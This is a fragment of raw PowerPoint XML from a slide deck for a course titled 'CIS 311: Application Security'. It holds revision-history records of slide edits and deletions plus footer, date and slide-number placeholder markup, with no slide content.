        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T20:10:58.627" v="43" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="718"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:01:23.583" v="47" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="722"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:13:47.192" v="62" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="723"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:13:47.192" v="62" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="723"/>
            <ac:spMk id="664579" creationId="{AF894E5C-7E84-CEA2-708F-02AFA365A492}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:21:26.857" v="64" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="728"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="735"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp del mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:02:49.193" v="215" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="744"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:01:39.199" v="213" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="744"/>
            <ac:spMk id="689155" creationId="{F915B0D4-8F45-53A6-C5A4-09B7B3D2944C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:02:49.193" v="215" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="745"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:51:27.002" v="191" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="746"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:51:27.002" v="191" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="746"/>
            <ac:spMk id="691203" creationId="{BE362261-FF34-AAE3-2284-097E33BFABB0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="747"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="748"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="749"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="750"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="751"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="752"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="753"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="754"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="755"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="756"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="759"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="761"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="762"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="763"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="764"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:00:24.645" v="46" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="772"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:00:24.645" v="46" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="772"/>
            <ac:picMk id="731139" creationId="{FEAD940D-3433-CC07-56DA-A2CBE3B14215}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:48:09.828" v="167"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="773"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:48:01.288" v="163" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="773"/>
            <ac:spMk id="2" creationId="{8215E602-EAE6-3255-8975-46ABDAC8E2F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:48:09.828" v="167"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="773"/>
            <ac:spMk id="732164" creationId="{379C8DB4-0FCD-6461-5F39-7B886F20BA77}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:48:09.827" v="165" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="773"/>
            <ac:picMk id="732165" creationId="{1B5700A3-8953-41BE-7A42-70E39C0C2269}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:25:03.882" v="89" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="774"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:19:32.762" v="63" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="775"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:24:23.859" v="88" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="777"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:37:29.536" v="145" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="778"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:40:06.612" v="154" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="779"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:47:35.988" v="155" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="780"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:53:02.452" v="196" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="781"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:55:35.138" v="200" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="782"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:55:44.664" v="202" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="783"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:00:27.294" v="206" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="784"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del mod modShow">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:39:41.435" v="256" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="785"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="786"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T19:56:12.990" v="37" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="787"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:10:56.991" v="55" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="788"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:10:56.991" v="55" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="788"/>
            <ac:spMk id="751619" creationId="{6DA66D8B-C81A-671A-5ACD-CF305FEC996F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:52:02.050" v="194" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="790"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:52:02.050" v="194" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="790"/>
            <ac:spMk id="754691" creationId="{A0F9A813-F5EF-35F7-7F53-65E1AF850EB5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del mod modShow">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:29:54.608" v="231" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="793"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:57.472" v="258" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="794"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="795"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="796"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:43:45.113" v="257" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="797"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T20:59:52.997" v="45" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="800"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T20:59:52.997" v="45" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="800"/>
            <ac:spMk id="765955" creationId="{4E6B6710-2B2D-0E6C-15E6-D32ACABDE1B7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:53:11.740" v="198" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="802"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:53:11.740" v="198" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="802"/>
            <ac:spMk id="768003" creationId="{C14F03DC-D693-18BD-707B-8FE7AFA1FD9E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:29:43.102" v="230" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="804"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T22:29:43.102" v="230" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="804"/>
            <ac:spMk id="770051" creationId="{EDD93092-C8D0-59FD-557F-971446B09DB4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:23:08.117" v="87" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="805"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Johnson, Chad" userId="29e26967-ee32-4210-a1e6-19e5305e9c5f" providerId="ADAL" clId="{D93A2744-4087-4E22-A6A3-9D8E14BFA662}" dt="2023-02-27T21:23:08.117" v="87" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="805"/>
            <ac:spMk id="771075" creationId="{30C43B6B-849C-B88D-A7E0-98D26026D5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F2CC-09FC-4DFC-A768-BC2A0A8E8603}"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89B78-E2C1-48E6-A493-E62A1AB2A595}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323817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9FAE78-7CC8-4044-9439-7DDCDB82DE6C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023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dirty="0"/>
              <a:t>CIS 311: Application Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9896911" y="5410199"/>
            <a:ext cx="771089" cy="3651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373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2/27/2023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873036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2/27/2023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6316097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2/27/2023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0921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2/27/2023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3281335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2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</a:t>
            </a:r>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8163783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2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIS 311: Application Security</a:t>
            </a:r>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553687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22837-9CC1-4A61-BAFA-7493765ADC66}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023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274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D60CC-8A0F-4A7F-BD8B-BB4A7F711A2F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
